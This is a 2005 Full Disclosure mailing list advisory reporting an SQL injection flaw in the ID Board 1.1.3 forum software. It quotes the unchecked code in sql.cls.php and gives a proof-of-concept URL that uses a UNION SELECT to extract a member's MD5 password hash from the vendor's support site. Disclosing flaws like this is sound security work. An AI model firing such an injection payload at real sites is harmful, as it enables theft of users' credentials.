Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

ID Board 1.1.3 SQL Injection Vulnerability

From: Defa <defa () systemli org>
Date: Sun, 10 Jul 2005 11:46:57 +0200
============================================================
Title: ID Board 1.1.3 SQL Injection Vulnerability
Vulnerability Discovery: me, myself and I
Date: 09/07/2005
Severity: Remote users can fetch MD5 Passwd Hash.
Affected version: 1.1.3 free (only one tested)
Vendor: http://www.id-team.com/
============================================================

============================================================

* Summary *
ID Board is a little Bulletin Board system. It is offered in three versions, I could only test the free one. Board is commonly used on german speaking websites. 

-------------------------------------------------------------

* Problem Description *
-----------------------

The bug reside in sql.cls.php - the tbl_suff variable isn't checked.

Vulnerable Code:

if (!ereg("LEFT JOIN", $from) && !ereg(",", $from) &&
     !ereg("AS", $from))
$from = "[tbl_prev]".$from."[tbl_suff]";


* Example * (Account required)
------------------------------
http://support.id-team.com/index.php?site=warn&f=1%20WHERE%200=1% 20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members% 20WHERE%20mem_id=1/*&0&warn=0 

-------------------------------------------------------------

* Fix *

 Contact the Vendor.

-------------------------------------------------------------

* References *

This mail.
-------------------------------------------------------------

* Credits *

no credit.
-------------------------------------------------------------

regards
defa

--
Don't eat yellow snow!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: